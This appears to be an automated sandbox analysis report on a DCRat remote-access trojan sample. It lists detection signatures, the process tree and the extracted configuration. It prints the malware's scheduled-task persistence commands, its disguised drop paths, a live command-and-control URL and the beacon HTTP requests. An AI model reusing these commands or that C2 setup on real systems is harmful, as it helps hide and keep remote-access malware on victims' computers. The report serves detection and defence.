Windows Analysis Report
DCRatBuild.exe

Overview

General Information

Sample name: DCRatBuild.exe
Analysis ID: 1561293
MD5: a92e55e04cc2026f53c97bdf0e91f6ba
SHA1: a31af958d3f885e0f55465acc214bdb0d56e672f
SHA256: f395305daac1c6e8fd577b85bc9132b5358c9e4c4b818b61f76d50d2477a3906
Tags: exe, user-aachum
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DCRatBuild.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\DCRatBuild.exe" MD5: A92E55E04CC2026F53C97BDF0E91F6BA)
    • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • portperf.exe (PID: 3968 cmdline: "C:\ChainBlocksurrogateagentFont\portperf.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
          • schtasks.exe (PID: 3500 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2444 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1136 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5140 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6096 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6600 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4952 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6316 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7184 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7200 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7216 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7232 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7256 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7272 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7316 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7344 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7360 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7376 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 6 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7392 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7408 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7424 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7456 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7500 cmdline: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7548 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7564 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 7704 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • w32tm.exe (PID: 7800 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • dfVXJbANbh.exe (PID: 7248 cmdline: "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • dfVXJbANbh.exe (PID: 7288 cmdline: "C:\Users\Default User\Videos\dfVXJbANbh.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • System.exe (PID: 7308 cmdline: "C:\Program Files\7-Zip\Lang\System.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • System.exe (PID: 7336 cmdline: "C:\Program Files\7-Zip\Lang\System.exe" MD5: A054982F7E12C1F491ECCD25D9C1B5D7)
  • cleanup
{"SCRT": "{\"c\":\"`\",\"V\":\"!\",\"u\":\";\",\"v\":\"(\",\"9\":\"-\",\"Q\":\" \",\"R\":\">\",\"w\":\"#\",\"d\":\"|\",\"P\":\"*\",\"Z\":\"_\",\"i\":\"~\",\"E\":\".\",\"n\":\"%\",\"S\":\"<\",\"D\":\"$\",\"I\":\",\",\"1\":\"&\",\"4\":\")\",\"A\":\"@\",\"J\":\"^\"}", "PCRT": "{\"w\":\"&\",\"y\":\",\",\"=\":\"#\",\"i\":\"(\",\"b\":\".\",\"M\":\"$\",\"6\":\">\",\"I\":\"`\",\"c\":\"*\",\"j\":\")\",\"e\":\"~\",\"x\":\"|\",\"S\":\"!\",\"Q\":\"%\",\"p\":\"-\",\"X\":\"_\",\"D\":\"@\",\"0\":\"<\",\"f\":\";\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ecQxDbp6oRSPS3tKADSR", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "H2": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "T": "0"}
Source | Rule | Description | Author | Strings
0000001A.00000002.2307312574.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000014.00000002.3401292480.00000000025CE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security |
00000018.00000002.2314012773.0000000002C76000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000017.00000002.2314115683.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000014.00000002.3401292480.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_3 | Yara detected DCRat | Joe Security |

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Default User\Videos\dfVXJbANbh.exe", CommandLine: "C:\Users\Default User\Videos\dfVXJbANbh.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Videos\dfVXJbANbh.exe, NewProcessName: C:\Users\Default\Videos\dfVXJbANbh.exe, OriginalFileName: C:\Users\Default\Videos\dfVXJbANbh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: "C:\Users\Default User\Videos\dfVXJbANbh.exe", ProcessId: 7288, ProcessName: dfVXJbANbh.exe
            Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ChainBlocksurrogateagentFont\portperf.exe, ProcessId: 3968, TargetFilename: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f, CommandLine: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ChainBlocksurrogateagentFont\portperf.exe", ParentImage: C:\ChainBlocksurrogateagentFont\portperf.exe, ParentProcessId: 3968, ParentProcessName: portperf.exe, ProcessCommandLine: schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f, ProcessId: 5140, ProcessName: schtasks.exe
            Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DCRatBuild.exe", ParentImage: C:\Users\user\Desktop\DCRatBuild.exe, ParentProcessId: 3472, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe" , ProcessId: 4776, ProcessName: wscript.exe

            Persistence and Installation Behavior

            Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ChainBlocksurrogateagentFont\portperf.exe", ParentImage: C:\ChainBlocksurrogateagentFont\portperf.exe, ParentProcessId: 3968, ParentProcessName: portperf.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f, ProcessId: 7532, ProcessName: schtasks.exe

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-23T02:20:10.246184+0100 | 2034194 | 1 | A Network Trojan was detected | 192.168.2.6 | 49723 | 185.114.245.123 | 80 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-23T02:20:23.852194+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 185.114.245.123 | 80 | 192.168.2.6 | 49757 | TCP
            2024-11-23T02:21:55.896496+0100 | 2850862 | 1 | Malware Command and Control Activity Detected | 185.114.245.123 | 80 | 192.168.2.6 | 49987 | TCP

            AV Detection

            Source: DCRatBuild.exe | Avira: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat | Avira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Program Files\7-Zip\Lang\System.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000014.00000002.3401292480.0000000002511000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"c\":\"`\",\"V\":\"!\",\"u\":\";\",\"v\":\"(\",\"9\":\"-\",\"Q\":\" \",\"R\":\">\",\"w\":\"#\",\"d\":\"|\",\"P\":\"*\",\"Z\":\"_\",\"i\":\"~\",\"E\":\".\",\"n\":\"%\",\"S\":\"<\",\"D\":\"$\",\"I\":\",\",\"1\":\"&\",\"4\":\")\",\"A\":\"@\",\"J\":\"^\"}", "PCRT": "{\"w\":\"&\",\"y\":\",\",\"=\":\"#\",\"i\":\"(\",\"b\":\".\",\"M\":\"$\",\"6\":\">\",\"I\":\"`\",\"c\":\"*\",\"j\":\")\",\"e\":\"~\",\"x\":\"|\",\"S\":\"!\",\"Q\":\"%\",\"p\":\"-\",\"X\":\"_\",\"D\":\"@\",\"0\":\"<\",\"f\":\";\",\"l\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-ecQxDbp6oRSPS3tKADSR", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "H2": "http://cy98085.tw1.ru/@=UmM2UTY4ADZ", "T": "0"}
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | ReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\Program Files\7-Zip\Lang\System.exe | ReversingLabs: Detection: 73%
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\Users\Public\Music\dfVXJbANbh.exe | ReversingLabs: Detection: 73%
            Source: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe | ReversingLabs: Detection: 73%
            Source: DCRatBuild.exe | ReversingLabs: Detection: 63%
            Source: DCRatBuild.exe | Virustotal: Detection: 54%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe | Joe Sandbox ML: detected
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Joe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Lang\System.exe | Joe Sandbox ML: detected
            Source: DCRatBuild.exe | Joe Sandbox ML: detected
            Source: DCRatBuild.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Directory created: C:\Program Files\7-Zip\Lang\System.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Directory created: C:\Program Files\7-Zip\Lang\27d1bcfc3c54e0
            Source: DCRatBuild.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: DCRatBuild.exe
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D6A5F4
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D7B8E0
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8AAA8 FindFirstFileExA,0_2_00D8AAA8
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\AppData
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\AppData\Local\Temp

            Networking

            Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.6:49723 -> 185.114.245.123:80
            Source: Network traffic | Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 185.114.245.123:80 -> 192.168.2.6:49757
            Source: Network traffic | Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 185.114.245.123:80 -> 192.168.2.6:49987
            Source: Malware configuration extractor | URLs: http://cy98085.tw1.ru/@=UmM2UTY4ADZ
            Source: Joe Sandbox View | ASN Name: TIMEWEB-ASRU TIMEWEB-ASRU
            Source: global traffic | HTTP traffic detected: GET /d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM HTTP/1.1 | Accept: */* | Content-Type: text/csv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: cy98085.tw1.ru | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1 | Accept: */* | Content-Type: text/csv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: cy98085.tw1.ru | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=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 HTTP/1.1 | Accept: */* | Content-Type: text/csv | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: cy98085.tw1.ru | Connection: Keep-Alive
